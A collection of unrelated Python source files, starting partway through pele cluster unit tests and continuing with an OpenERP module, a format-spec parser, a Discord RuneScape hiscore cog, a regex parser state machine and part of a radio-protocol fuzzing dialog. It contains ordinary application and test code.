        g = np.array(range(9), dtype=float).reshape([-1,3])
        print g.reshape(-1)
        
        print rf.transform_grad(p, g)
    
    def test_to_atomistic2(self):
        x0 = np.array(range(self.nrigid * 6), dtype=float)
        x2 = x0.reshape([-1,3])
        for p in x2[self.nrigid:,:]:
            p /= np.linalg.norm(p)
        atomistic = self.topology.to_atomistic(x0).flatten()
        
        from pele.potentials import LJ
        lj = LJ()
        e, g = lj.getEnergyGradient(atomistic.reshape(-1))
        grb = self.topology.transform_gradient(x0, g)
        rbpot = RBPotentialWrapper(self.topology, lj)
        print rbpot.getEnergy(x0)


class TestCppRBPotentialWrapper(TestOTPExplicit):
    def test_pot_wrapper(self):
        from pele.angleaxis import _cpp_aa
        from pele.potentials import LJ
        rbpot_cpp = _cpp_aa.RBPotentialWrapper(self.topology, LJ())
        rbpot = RBPotentialWrapper(self.topology, LJ())
        
        self.assertAlmostEqual(rbpot_cpp.getEnergy(self.x0), 
                               rbpot.getEnergy(self.x0), 4)
        
        e1, grad1 = rbpot_cpp.getEnergyGradient(self.x0)
        e2, grad2 = rbpot.getEnergyGradient(self.x0)
        self.assertAlmostEqual(e1, e2, 4)
        for g1, g2 in zip(grad1, grad2):
            self.assertAlmostEqual(g1, g2, 3) 
#         print "energy cpp"
#         print e1, e2
#         print grad1
#         print grad2
        

_x1 = np.array([ 1.9025655 ,  0.39575842,  2.70994994,  1.12711741,  0.63413933,
                1.99433564,  1.86553644,  1.71434811,  2.22927686,  0.80189315,
                1.19513512,  3.02357997,  1.25845172, -0.06244027,  1.27217385,
               -2.26564485,  0.25537024,  0.66231258, -1.49510664,  0.94428774,
               -0.04120075, -0.87664883, -0.21441754,  2.05796547])
_x2 = np.array([ 2.01932983,  0.32928065,  2.34949584,  1.12261277,  0.84195098,
                2.08827517,  1.42644916,  1.83608794,  2.23147536,  1.12872074,
                0.93206141,  3.28789605,  1.73243138, -0.1199651 ,  1.02925229,
               -1.64603729,  0.30701482,  0.90204992, -1.96259809,  0.06557119,
                0.11010908, -0.37462588, -0.42374544,  1.97728056])
 
class TestOTPCluster(unittest.TestCase):
    def setUp(self):
        np.random.seed(0)
        self.nmol = 4
        self.system = OTPCluster(self.nmol)
        pot = self.system.get_potential()
        self.db = self.system.create_database()
        self.m1 = self.db.addMinimum(pot.getEnergy(_x1), _x1)
        self.m2 = self.db.addMinimum(pot.getEnergy(_x2), _x2)
    
    def test1(self):
        pot = self.system.get_potential()
        self.assertLess(np.linalg.norm(pot.getGradient(self.m1.coords)), .1)
        self.assertLess(np.linalg.norm(pot.getGradient(self.m2.coords)), .1)
    
    def test_basinhopping(self):
        db = self.system.create_database()
        bh = self.system.get_basinhopping(db)
        bh.setPrinting(ostream=None)
        bh.run(5)
        self.assertGreaterEqual(db.number_of_minima(), 1)

    def test_double_ended_connect(self):
        connect = self.system.get_double_ended_connect(self.m1, self.m2, self.db)
        connect.connect()
        self.assertTrue(connect.success())
        
        path = connect.returnPath()
    
    def test_thermodynamics(self):
        get_thermodynamic_information(self.system, self.db, nproc=None, recalculate=True)
        self.assertIsNotNone(self.m1.fvib)
        
        mt = self.system.get_metric_tensor(self.m1.coords)
        print "metric tensor"
        print mt
    
class TestRBTopologyOTP(unittest.TestCase):
    def setUp(self):
        np.random.seed(0)
        self.nmol = 3
        self.system = OTPCluster(self.nmol)
#        pot = self.system.get_potential()
#        self.db = self.system.create_database()
#        self.m1 = self.db.addMinimum(pot.getEnergy(_x1), _x1)
#        self.m2 = self.db.addMinimum(pot.getEnergy(_x2), _x2)

        self.x0 = np.array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 
                             0.517892, 0.575435, 0.632979, 
                             0.531891, 0.576215, 0.620539, 
                             0.540562, 0.5766, 0.612637 ])
        
        from pele.angleaxis.aamindist import TransformAngleAxisCluster
        self.topology = self.system.aatopology
        self.transform = TransformAngleAxisCluster(self.topology)
        
        self.p0 = np.array(range(1,4), dtype=float)
        self.p0 /= np.linalg.norm(self.p0)

    
    def test_transform_rotate(self):
        print "\ntest rotate"
        x = self.x0.copy()
        p = np.array(range(1,4), dtype=float)
        p /= np.linalg.norm(p)
        self.transform.rotate(x, rotations.aa2mx(p))
        
        xnewtrue = np.array([ 0.48757698,  0.61588594,  2.09355038,  2.02484605,  4.76822812,
                            4.81289924,  3.56211511,  8.92057031,  7.53224809,  0.71469473,
                            1.23875927,  1.36136748,  0.72426504,  1.24674367,  1.34426835,
                            0.73015833,  1.25159032,  1.33345003])
        for v1, v2 in izip(x, xnewtrue):
            self.assertAlmostEqual(v1, v2, 5)
    
    def test_align_path(self):
        print "\ntest align_path"
        x1 = self.x0.copy()
        x2 = self.x0 + 5
        
        self.topology.align_path([x1, x2])
        
        x2true = np.array([  5.        ,   6.        ,   7.        ,   8.        ,
                             9.        ,  10.        ,  11.        ,  12.        ,
                            13.        ,   1.92786071,   1.94796529,   1.96807021,
                             1.93320298,   1.94869267,   1.96418236,   1.93645608,
                             1.94905155,   1.96164668])
        
        for v1, v2 in izip(x1, self.x0):
            self.assertAlmostEqual(v1, v2, 5)
        for v1, v2 in izip(x2, x2true):
            self.assertAlmostEqual(v1, v2, 5)
    
    def test_cpp_zero_ev(self):
        print "\ntest zeroEV cpp"
        x = self.x0.copy()
        zev = self.topology._zeroEV_python(x)
        czev = self.topology.cpp_topology.get_zero_modes(x)
        self.assertEqual(len(czev), 6)
        for ev, cev in izip(zev, czev):
            for v1, v2 in izip(ev, cev):
                self.assertAlmostEqual(v1, v2, 5)     
    
    def test_site_distance_squared(self):
        print "\ntest site distance squared"
        c0 = np.zeros(3)
        c1 = np.ones(3)
        p0 = self.p0.copy()
        p1 = p0 + 1
        site = self.system.make_otp()
        d2 = site.distance_squared(c0, p0, c1, p1)
        d2p = _sitedist(c1-c0, p0, p1, site.S, site.W, site.cog)
        self.assertAlmostEqual(d2, 10.9548367929, 5)


    def test_distance_squared(self):
        print "\ntest distance squared"
        x1 = self.x0.copy()
        x2 = self.x0 + 1.1
        d2 = self.topology.distance_squared(x1, x2)
        d3 = self.topology._distance_squared_python(x1, x2)
        self.assertAlmostEqual(d2, 38.9401810973, 5)
        self.assertAlmostEqual(d2, d3, 5)
        


    def test_distance_squared_grad(self):
        print "\ntest distance squared grad"
        x1 = self.x0.copy()
        x2 = self.x0 + 1.1
        grad = self.topology.distance_squared_grad(x1, x2)
        g2 = self.topology._distance_squared_grad_python(x1, x2)
        
        gtrue = np.array([-6.6       , -6.6       , -6.6       , -6.6       , -6.6       ,
                       -6.6       , -6.6       , -6.6       , -6.6       , -1.21579025,
                       -0.07013805, -1.2988823 , -1.21331786, -0.06984532, -1.28945301,
                       -1.2116105 , -0.06975828, -1.28362943])
        for v1, v2 in izip(grad, gtrue):
            self.assertAlmostEqual(v1, v2, 5)
        for v1, v2 in izip(grad, g2):
            self.assertAlmostEqual(v1, v2, 5)
    
    def test_measure_align(self):
        print "\ntest measure align"
        x1 = self.x0.copy()
        x2 = self.x0 + 5.1
        x2[-1] = x1[-1] + .1
        x20 = x2.copy()
        measure = MeasureRigidBodyCluster(self.topology)
        measure.align(x1, x2)

if __name__ == "__main__":
    unittest.main()


# -*- coding: utf8 -*-
SQL = """select SQL_CALC_FOUND_ROWS * FROM doc_view order by `name` asc limit %(offset)d,%(limit)d ;"""
FOUND_ROWS = True
ROOT = "doc_view_list"
ROOT_PREFIX = "<doc_view_edit />"
ROOT_POSTFIX= None
XSL_TEMPLATE = "data/af-web.xsl"
EVENT = None
WHERE = ()
PARAM = None
TITLE="Список видов документов"
MESSAGE="ошибка получения списка видов документов"
ORDER = None

# -*- encoding: utf-8 -*-
#
#    OpenERP, Open Source Management Solution
#    This module copyright (C) 2014 Savoir-faire Linux
#    (<http://www.savoirfairelinux.com>).
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#

import logging
from openerp.osv import osv, fields

_logger = logging.getLogger(__name__)


class res_users(osv.osv):
    _inherit = "res.users"
    _columns = {
        'xis_user_external_id': fields.integer('XIS external user',
                                               required=True),
    }

"""
Contains format specification class and methods to parse it from JSON.

.. codeauthor:: Tomas Krizek <tomas.krizek1@tul.cz>
"""
import json
import re


def get_root_input_type_from_json(data):
    """Return the root input type from JSON formatted string."""
    return parse_format(json.loads(data))


def parse_format(data):
    """Returns root input type from data."""
    input_types = {}
    data = data['ist_nodes']
    root_id = data[0]['id']      # set root type

    for item in data:
        input_type = _get_input_type(item)
        if input_type is not None:
            input_types[input_type['id']] = input_type  # register by id

    _substitute_ids_with_references(input_types)
    return input_types[root_id]


SCALAR = ['Integer', 'Double', 'Bool', 'String', 'Selection', 'FileName']


def is_scalar(input_type):
    """Returns True if input_type is scalar."""
    return input_type['base_type'] in SCALAR


RE_PARAM = re.compile('^<([a-zA-Z][a-zA-Z0-9_]*)>$')


def is_param(value):
    """Determine whether given value is a parameter string."""
    if not isinstance(value, str):
        return False
    return RE_PARAM.match(value)


def _substitute_ids_with_references(input_types):
    """Replaces ids or type names with python object references."""
    input_type = {}

    def _substitute_implementations():
        """Replaces implementation ids with input_types."""
        impls = {}
        for id_ in input_type['implementations']:
            type_ = input_types[id_]
            impls[type_['name']] = type_
        input_type['implementations'] = impls

    def _substitute_default_descendant():
        """Replaces default descendant id with input_type."""
        id_ = input_type.get('default_descendant', None)
        if id_ is not None:
            input_type['default_descendant'] = input_types[id_]

    def _substitute_key_type():
        """Replaces key type with input_type."""
        # pylint: disable=unused-variable, invalid-name
        for __, value in input_type['keys'].items():
            value['type'] = input_types[value['type']]

    # pylint: disable=unused-variable, invalid-name
    for __, input_type in input_types.items():
        if input_type['base_type'] == 'Array':
            input_type['subtype'] = input_types[input_type['subtype']]
        elif input_type['base_type'] == 'Abstract':
            _substitute_implementations()
            _substitute_default_descendant()
        elif input_type['base_type'] == 'Record':
            _substitute_key_type()


def _get_input_type(data):
    """Returns the input_type data structure that defines an input type
    and its constraints for validation."""
    if 'id' not in data or 'input_type' not in data:
        return None
    input_type = dict(
        id=data['id'],
        base_type=data['input_type']
    )
    input_type['name'] = data.get('name', '')
    input_type['full_name'] = data.get('full_name', '')
    input_type['description'] = data.get('description', '')
    input_type['attributes'] = data.get('attributes', {})
    if input_type['base_type'] in ['Double', 'Integer']:
        input_type.update(_parse_range(data))
    elif input_type['base_type'] == 'Array':
        input_type.update(_parse_range(data))
        if input_type['min'] < 0:
            input_type['min'] = 0
        input_type['subtype'] = data['subtype']
    elif input_type['base_type'] == 'FileName':
        input_type['file_mode'] = data['file_mode']
    elif input_type['base_type'] == 'Selection':
        input_type['values'] = _list_to_dict(data['values'], 'name')
    elif input_type['base_type'] == 'Record':
        input_type['keys'] = _list_to_dict(data['keys'])
        input_type['implements'] = data.get('implements', [])
        input_type['reducible_to_key'] = data.get('reducible_to_key', None)
    elif input_type['base_type'] == 'Abstract':
        input_type['implementations'] = data['implementations']
        input_type['default_descendant'] = data.get('default_descendant', None)
    return input_type


def _parse_range(data):
    """Parses the format range properties - min, max."""
    input_type = {}
    try:
        input_type['min'] = data['range'][0]
    except (KeyError, TypeError):  # set default value
        input_type['min'] = float('-inf')
    try:
        input_type['max'] = data['range'][1]
    except (KeyError, TypeError):  # set default value
        input_type['max'] = float('inf')
    return input_type


def _list_to_dict(list_, key_label='key'):
    """
    Transforms a list of dictionaries into a dictionary of dictionaries.

    Original dictionaries are assigned key specified in each of them
    by key_label.
    """
    dict_ = {}
    for item in list_:
        dict_[item[key_label]] = item
    return dict_


"""
Page view class
"""


import os

from Server.Importer import ImportFromModule


class PageView(ImportFromModule("Server.PageViewBase", "PageViewBase")):
    """
    Page view class.
    """


    _PAGE_TITLE = "Python Web Framework"


    def __init__(self, htmlToLoad):
        """
        Constructor.
        - htmlToLoad : HTML to load
        """
        self.SetPageTitle(self._PAGE_TITLE)

        self.AddMetaData("charset=\"UTF-8\"")
        self.AddMetaData("name=\"viewport\" content=\"width=device-width, initial-scale=1\"")

        self.AddStyleSheet("/css/styles.css")

        self.AddJavaScript("/js/http.js")

        self.LoadHtml(os.path.join(os.path.dirname(__file__), "%s.html" % htmlToLoad))

        self.SetPageData({ "PageTitle" : self._PAGE_TITLE })

import discord
import asyncio
import datetime
import time
import aiohttp
import threading
import glob
import re
import json
import os
import urllib.request
from discord.ext import commands
from random import randint
from random import choice as randchoice
from random import choice as rndchoice
from random import shuffle
from .utils.dataIO import fileIO
from .utils import checks
from bs4 import BeautifulSoup

class Runescapecompare:
    """Runescape-relate commands"""
    
    def __init__(self, bot):
        self.bot = bot
        """
        imLink = http://services.runescape.com/m=hiscore_ironman/index_lite.ws?player=
        nmLink = http://services.runescape.com/m=hiscore/index_lite.ws?player=
        """
        
    @commands.group(name="compare", pass_context=True)
    async def _compare(self, ctx):
        if ctx.invoked_subcommand is None:
            await self.bot.say("Please, choose a skill to compare!")
      
    
    #####Overall#####
    @_compare.command(name="overall", pass_context=True)
    async def compare_overall(self, ctx, name1 : str, name2 : str):
        address1 = "http://services.runescape.com/m=hiscore_ironman/index_lite.ws?player=" + name1
        address2 = "http://services.runescape.com/m=hiscore_ironman/index_lite.ws?player=" + name2
        
        try:
            website1 = urllib.request.urlopen(address1)
            website2 = urllib.request.urlopen(address2)
            website_html1 = website1.read().decode(website1.headers.get_content_charset())
            website_html2 = website2.read().decode(website2.headers.get_content_charset())
            stats1 = website_html1.split("\n")
            stats2 = website_html2.split("\n")
            stat1 = stats1[0].split(",")
            stat2= stats2[0].split(",")
            if stat1[2] > stat2[2]:
              comparerank = int(stat2[0]) - int(stat1[0])
              comparelvl = int(stat1[1]) - int(stat2[1])
              comparexp = int(stat1[2]) - int(stat2[2])
              await self.bot.say("```" + name1 + "'s ranking is " + str(comparerank) + " ranks higher than " + name2 + "'s rank.\n" + name1 + "'s level is " + str(comparelvl) + " levels higher than " + name2 + "'s.\n" + name1 + "'s total experience is " + str(comparexp) + " higher than " + name2 + "'s.```")
            if stat2[2] > stat1[2]:
              comparerank = stat2[0] - stat1[0]
              comparelvl = stat2[1] - stat1[1]
              comparexp = stat2[2] - stat1[2]
              await self.bot.say("```" + name2 + "'s ranking is " + str(comparerank) + " ranks higher than " + name1 + "'s rank.\n" + name2 + "'s level is " + str(comparelvl) + " levels higher than " + name1 + "'s.\n" + name2 + "'s total experience is " + str(comparexp) + " higher than " + name1 + "'s.```")
        except:
            await self.bot.say("Sorry... Something went wrong there. Did you type the name correctly?")
            
def setup(bot):
    n = Runescapecompare(bot)
    bot.add_cog(n)


import string

import ast
from state_machine import PSM, Source



class SpecialPattern:
    individual_chars = ('t', 'n', 'v', 'f', 'r', '0')
    range_chars = ('d', 'D', 'w', 'W', 's', 'S')

    special_chars = ('^', '$', '[', ']', '(', ')', '{', '}', '\\', '.', '*',
                     '?', '+', '|', '.')
    restrict_special_chars = ('\\', '[', ']')

    posix_classes = ("alnum", "alpha", "blank", "cntrl", "digit", "graph",
                     "lower", "print", "punct", "space", "upper", "xdigit",
                     "d", "w", "s")
    min_len_posix_class = 1


#-------------------------------------
# Group

class WrappedGroup:
    def __init__(self):
        self.group = ast.Group()
        self.is_alt = False

    def add(self, other):
        if self.is_alt:
            last_alt = self.alt.parts[-1] + (other,)
            self.alt.parts = self.alt.parts[:-1] + (last_alt,)
        else:
            self.group.seq = self.group.seq + (other,)

    @property
    def alt(self) -> ast.Alternative:
        assert self.is_alt
        return self.group.seq[0]

    def collapse_alt(self):
        if self.is_alt:
            self.alt.parts = self.alt.parts + ((),)
        else:
            self.is_alt = True
            first_alt_elems = self.group.seq
            self.group.seq = (ast.Alternative(),)
            self.alt.parts = (first_alt_elems,())


class OpeningOfGroup:
    def __init__(self, parent: None, initial: bool=False):
        self.is_initial = initial
        self.parent = parent  # OpeningOfGroup or ContentOfGroup
        self.g = WrappedGroup()
        self.content_of_initial = None

        # forward of function
        self.add = self.g.add

        # if this group is the initial, their is no parent but we must refer
        # to itself as the returning state
        # but if it is a nested group, it must be added into its global group
        if self.is_initial:
            self.content_of_initial = ContentOfGroup(self, initial)
        else:
            self.parent.add(self.g.group)

    def next(self, psm: PSM):
        if not self.is_initial and psm.char == "?":
            return FirstOptionOfGroup(self)
        elif psm.char == ")":
            if self.is_initial:
                psm.error = 'unexpected ")"'
            else:
                return self.parent
        elif psm.char == "(":
            return OpeningOfGroup(self)
        elif self.is_initial:
            return self.content_of_initial.next(psm)
        else:
            t = ContentOfGroup(self)
            return t.next(psm)


class FirstOptionOfGroup:
    def __init__(self, parent: OpeningOfGroup):
        self.parent = parent

    def next(self, psm: PSM):
        if psm.char == ":":
            self.parent.g.group.ignored = True
            return ContentOfGroup(self.parent)
        elif psm.char == "!":
            self.parent.g.group.lookhead = ast.Group.NegativeLookhead
            return ContentOfGroup(self.parent)
        elif psm.char == "=":
            self.parent.g.group.lookhead = ast.Group.PositiveLookhead
            return ContentOfGroup(self.parent)
        elif psm.char == "<":
            self.parent.g.group.name = ""
            return NameOfGroup(self.parent)
        else:
            psm.error = 'expected ":", "!", "<" or "="'


class NameOfGroup:
    def __init__(self, parent: OpeningOfGroup):
        self.parent = parent

    def next(self, psm: PSM):
        if psm.char.isalpha() or psm.char == "_":
            self.parent.g.group.name += psm.char
            return self
        elif psm.char == ">":
            return self.parent
        else:
            psm.error = 'expected a letter, "_" or ">"'


class ContentOfGroup:
    NotQuantified = 0
    Quantified = 1
    UngreedyQuantified = 2

    def __init__(self, parent: OpeningOfGroup, initial: bool=False):
        self.parent = parent
        self.is_initial = initial
        self.limited_prev = parent if initial else self
        self.quantified = ContentOfGroup.NotQuantified

        # forward of function
        self.add = self.parent.add

    def next(self, psm: PSM):
        quantified = self.quantified
        self.quantified = ContentOfGroup.NotQuantified

        if psm.char == ")":
            if self.is_initial:
                psm.error = "unbalanced parenthesis"
            else:
                return self.parent.parent

        elif psm.char == "(":
            return OpeningOfGroup(self.limited_prev)

        elif psm.char == "^":
            self.add(ast.MatchBegin())
            return self.limited_prev

        elif psm.char == "$":
            self.add(ast.MatchEnd())
            return self.limited_prev

        elif psm.char == ".":
            t = ast.PatternChar()
            t.pattern = psm.char
            self.add(t)
            return self.limited_prev

        elif psm.char == "\\":
            return EscapedChar(self.limited_prev,
                               as_single_chars=SpecialPattern.special_chars)

        elif psm.char == "[":
            return CharClass(self.limited_prev)

        elif psm.char == "|":
            self.parent.g.collapse_alt()
            return self.limited_prev

        # >>> Quantifiers
        elif psm.char == "?" and quantified == ContentOfGroup.NotQuantified:
            self.quantified = ContentOfGroup.Quantified
            last = self._last_or_fail(psm)
            if last:
                last.quantifier = ast.NoneOrOnce()
            return self.limited_prev

        elif psm.char == "*" and quantified == ContentOfGroup.NotQuantified:
            self.quantified = ContentOfGroup.Quantified
            last = self._last_or_fail(psm)
            if last:
                last.quantifier = ast.NoneOrMore()
            return self.limited_prev

        elif psm.char == "+" and quantified == ContentOfGroup.NotQuantified:
            self.quantified = ContentOfGroup.Quantified
            last = self._last_or_fail(psm)
            if last:
                last.quantifier = ast.OneOrMore()
            return self.limited_prev

        elif psm.char == "{" and quantified == ContentOfGroup.NotQuantified:
            self.quantified = ContentOfGroup.Quantified
            t = MinimumOfRepetition(self.limited_prev)
            last = self._last_or_fail(psm)
            if last:
                last.quantifier = t.between
            return t

        elif psm.char == "?" and quantified == ContentOfGroup.Quantified:
            self.quantified = ContentOfGroup.UngreedyQuantified
            last = self._last_or_fail(psm)
            if last:
                last.quantifier.greedy = False
            return self.limited_prev

        elif quantified == ContentOfGroup.Quantified:
            psm.error = "unexpected quantifier"

        elif quantified == ContentOfGroup.UngreedyQuantified:
            psm.error = "quantifier repeated"
        # <<< Quantifier

        else:
            t = ast.SingleChar()
            t.char = psm.char
            self.add(t)
            return self.limited_prev

    def _last_or_fail(self, psm: PSM):
        if self.parent.g.group.seq:
            return self.parent.g.group.seq[-1]
        else:
            psm.error = "nothing to repeat"


class MinimumOfRepetition:
    def __init__(self, parent: ContentOfGroup):
        self.parent = parent
        self.between = ast.Between()
        self.min = []

    def next(self, psm: PSM):
        if psm.char.isdigit():
            self.min.append(psm.char)
            return self
        elif psm.char == ",":
            self._interpret()
            return MaximumOfRepetition(self)
        elif psm.char == "}":
            self._interpret()
            return self.parent
        else:
            psm.error = 'expected digit, "," or "}"'

    def _interpret(self):
        if not self.min:
            return

        try:
            count = int("".join(self.min))
        except ValueError:
            assert False, "internal error: cannot convert to number minimum of repetition"
        self.between.min = count


class MaximumOfRepetition:
    def __init__(self, repeat: MinimumOfRepetition):
        self.repeat = repeat
        self.max = []

    def next(self, psm: PSM):
        if psm.char.isdigit():
            self.max.append(psm.char)
            return self
        elif psm.char == "}":
            self._interpret()
            return self.repeat.parent
        else:
            psm.error = 'expected digit, "," or "}"'

    def _interpret(self):
        if not self.max:
            return

        try:
            count = int("".join(self.max))
        except ValueError:
            assert False, "internal error: cannot convert to number maximum of repetition"
        self.repeat.between.max = count


#--------------------------------------
# Escaping

class EscapedChar:
    def __init__(self, prev, as_single_chars=(), as_pattern_chars=()):
        self.prev = prev  # ContentOfGroup or CharClass
        self.single_chars = as_single_chars
        self.pattern_chars = as_pattern_chars

    def next(self, psm: PSM):
        if psm.char in SpecialPattern.individual_chars \
           or psm.char in SpecialPattern.range_chars \
           or psm.char in self.pattern_chars:
            t = ast.PatternChar()
            t.pattern = psm.char
            self.prev.add(t)
            return self.prev
        elif psm.char in self.single_chars:
            t = ast.SingleChar()
            t.char = psm.char
            self.prev.add(t)
            return self.prev
        elif psm.char == "x":
            return AsciiChar(self.prev)
        elif psm.char == "u":
            return UnicodeChar(self.prev)
        else:
            psm.error = "unauthorized escape of {}".format(psm.char)


class AsciiChar:
    def __init__(self, prev):
        self.prev = prev  # ContentOfGroup or CharClass
        self.pattern = ast.PatternChar()
        self.pattern.type = ast.PatternChar.Ascii

        self.prev.add(self.pattern)

    def next(self, psm: PSM):
        if psm.char in string.hexdigits:
            self.pattern.pattern += psm.char
            count = len(self.pattern.pattern)
            return self.prev if count >= 2 else self
        else:
            psm.error = "expected ASCII hexadecimal character"


class UnicodeChar:
    def __init__(self, prev):
        self.prev = prev  # ContentOfGroup or CharClass
        self.pattern = ast.PatternChar()
        self.pattern.type = ast.PatternChar.Unicode

        self.prev.add(self.pattern)

    def next(self, psm: PSM):
        if psm.char in string.hexdigits:
            self.pattern.pattern += psm.char
            count = len(self.pattern.pattern)
            return self.prev if count >= 4 else self
        else:
            psm.error = "expected ASCII hexadecimal character"


#-------------------------------------
# Character class

class WrappedCharClass:
    def __init__(self):
        # ast is CharClass or may be changed to PatternClass in one case
        self.ast = ast.CharClass()

    def add(self, other):
        assert isinstance(self.ast, ast.CharClass)
        self.ast.elems = self.ast.elems + (other,)

    def pop(self):
        assert isinstance(self.ast, ast.CharClass)
        last = self.ast.elems[-1]
        self.ast.elems = self.ast.elems[:-1]
        return last


class CharClass:
    def __init__(self, prev):
        self.prev = prev  # ContentOfGroup or CharClass
        self.q = WrappedCharClass()

        # forward function
        self.add = self.q.add

        self.next_is_range = False
        self.empty = True
        self.can_mutate = True

    def next(self, psm: PSM):
        this_should_be_range = self.next_is_range
        self.next_is_range = False

        this_is_empty = self.empty
        self.empty = False

        if psm.char == "\\":
            self.can_mutate = False
            self.next_is_range = this_should_be_range

            return EscapedChar(self,
                               as_single_chars=SpecialPattern.restrict_special_chars)

        elif this_should_be_range and psm.char != "]":
            assert isinstance(self.q.ast, ast.CharClass)
            assert len(self.q.ast.elems) >= 1
            self.next_is_range = False
            t = ast.Range()
            t.begin = self.q.pop()
            t.end = ast.SingleChar()
            t.end.char = psm.char
            self.q.add(t)
            return self

        elif psm.char == "^":
            # if at the begining, it has a special meaning
            if this_is_empty:
                self.can_mutate = False
                self.q.ast.negate = True
            else:
                t = ast.SingleChar()
                t.char = psm.char
                self.q.add(t)
            return self

        elif psm.char == "]":
            if this_should_be_range:
                t = ast.SingleChar()
                t.char = "-"
                self.q.add(t)
            else:
                self.mutate_if_posix_like()

            self.prev.add(self.q.ast)
            return self.prev

        elif psm.char == "[":
            return CharClass(self)

        elif psm.char == "-" and len(self.q.ast.elems) >= 1:
            self.next_is_range = True
            return self

        else:
            t = ast.SingleChar()
            t.char = psm.char
            self.q.add(t)
            return self

    def mutate_if_posix_like(self):
        """
        Change from character class to pattern char if the content is matching
        POSIX-like classe.
        """
        assert isinstance(self.q.ast, ast.CharClass)

        # put in this variable everything that had happen but not saved into
        # the single char object
        # because mutation is only possible if the exact string of the content
        # match a pre-definied list, so if an unlogged char is consumed, it
        # must prevent mutation
        if not self.can_mutate:
            return

        if len(self.q.ast.elems) < SpecialPattern.min_len_posix_class + 2:
            return

        opening = self.q.ast.elems[0]
        if not isinstance(opening, ast.SingleChar) or opening.char != ":":
            return

        closing = self.q.ast.elems[-1]
        if not isinstance(closing, ast.SingleChar) or closing.char != ":":
            return

        is_only_ascii = lambda x: (isinstance(x, ast.SingleChar)
                                   and len(x.char) == 1
                                   and x.char.isalpha())
        class_may_be_a_word = not any(
            not is_only_ascii(x) for x in self.q.ast.elems[1:-1])
        if not class_may_be_a_word:
            return

        word = "".join(s.char for s in self.q.ast.elems[1:-1])
        if word not in SpecialPattern.posix_classes:
            return

        t = ast.PatternChar()
        t.pattern = word
        t.type = ast.PatternChar.Posix
        self.q.ast = t


#-------------------------------------
def parse(expr, **kw):
    sm = PSM()
    sm.source = Source(expr)
    sm.starts_with(OpeningOfGroup(parent=None, initial=True))
    sm.pre_action = kw.get("pre_action", None)
    sm.post_action = kw.get("post_action", None)
    sm.parse()
    return sm.state.g.group

'''WARCAT: Web ARChive (WARC) Archiving Tool

Tool and library for handling Web ARChive (WARC) files.
'''

from .version import *

import math

from PyQt5.QtCore import Qt, pyqtSlot
from PyQt5.QtGui import QCloseEvent
from PyQt5.QtWidgets import QDialog, QInputDialog

from urh import settings
from urh.models.FuzzingTableModel import FuzzingTableModel
from urh.signalprocessing.ProtocoLabel import ProtocolLabel
from urh.signalprocessing.ProtocolAnalyzerContainer import ProtocolAnalyzerContainer
from urh.ui.ui_fuzzing import Ui_FuzzingDialog


class FuzzingDialog(QDialog):
    def __init__(self, protocol: ProtocolAnalyzerContainer, label_index: int, msg_index: int, proto_view: int,
                 parent=None):
        super().__init__(parent)
        self.ui = Ui_FuzzingDialog()
        self.ui.setupUi(self)
        self.setAttribute(Qt.WA_DeleteOnClose)
        self.setWindowFlags(Qt.Window)

        self.protocol = protocol
        msg_index = msg_index if msg_index != -1 else 0
        self.ui.spinBoxFuzzMessage.setValue(msg_index + 1)
        self.ui.spinBoxFuzzMessage.setMinimum(1)
        self.ui.spinBoxFuzzMessage.setMaximum(self.protocol.num_messages)

        self.ui.comboBoxFuzzingLabel.addItems([l.name for l in self.message.message_type])
        self.ui.comboBoxFuzzingLabel.setCurrentIndex(label_index)

        self.proto_view = proto_view
        self.fuzz_table_model = FuzzingTableModel(self.current_label, proto_view)
        self.fuzz_table_model.remove_duplicates = self.ui.chkBRemoveDuplicates.isChecked()
        self.ui.tblFuzzingValues.setModel(self.fuzz_table_model)
        self.fuzz_table_model.update()

        self.ui.spinBoxFuzzingStart.setValue(self.current_label_start + 1)
        self.ui.spinBoxFuzzingEnd.setValue(self.current_label_end)
        self.ui.spinBoxFuzzingStart.setMaximum(len(self.message_data))
        self.ui.spinBoxFuzzingEnd.setMaximum(len(self.message_data))

        self.update_message_data_string()
        self.ui.tblFuzzingValues.resize_me()

        self.create_connects()
        self.restoreGeometry(settings.read("{}/geometry".format(self.__class__.__name__), type=bytes))

    @property
    def message(self):
        return self.protocol.messages[int(self.ui.spinBoxFuzzMessage.value() - 1)]

    @property
    def current_label_index(self):
        return self.ui.comboBoxFuzzingLabel.currentIndex()

    @property
    def current_label(self) -> ProtocolLabel:
        if len(self.message.message_type) == 0:
            return None

        cur_label = self.message.message_type[self.current_label_index].get_copy()
        self.message.message_type[self.current_label_index] = cur_label
        cur_label.fuzz_values = [fv for fv in cur_label.fuzz_values if fv]  # Remove empty strings

        if len(cur_label.fuzz_values) == 0:
            cur_label.fuzz_values.append(self.message.plain_bits_str[cur_label.start:cur_label.end])
        return cur_label

    @property
    def current_label_start(self):
        if self.current_label and self.message:
            return self.message.get_label_range(self.current_label, self.proto_view, False)[0]
        else:
            return -1

    @property
    def current_label_end(self):
        if self.current_label and self.message:
            return self.message.get_label_range(self.current_label, self.proto_view, False)[1]
        else:
            return -1

    @property
    def message_data(self):
        if self.proto_view == 0:
            return self.message.plain_bits_str
        elif self.proto_view == 1:
            return self.message.plain_hex_str
        elif self.proto_view == 2:
            return self.message.plain_ascii_str
        else:
            return None

    def create_connects(self):
        self.ui.spinBoxFuzzingStart.valueChanged.connect(self.on_fuzzing_start_changed)
        self.ui.spinBoxFuzzingEnd.valueChanged.connect(self.on_fuzzing_end_changed)
        self.ui.comboBoxFuzzingLabel.currentIndexChanged.connect(self.on_combo_box_fuzzing_label_current_index_changed)
        self.ui.btnRepeatValues.clicked.connect(self.on_btn_repeat_values_clicked)
        self.ui.btnAddRow.clicked.connect(self.on_btn_add_row_clicked)
        self.ui.btnDelRow.clicked.connect(self.on_btn_del_row_clicked)
        self.ui.tblFuzzingValues.deletion_wanted.connect(self.delete_lines)
        self.ui.chkBRemoveDuplicates.stateChanged.connect(self.on_remove_duplicates_state_changed)
        self.ui.sBAddRangeStart.valueChanged.connect(self.on_fuzzing_range_start_changed)
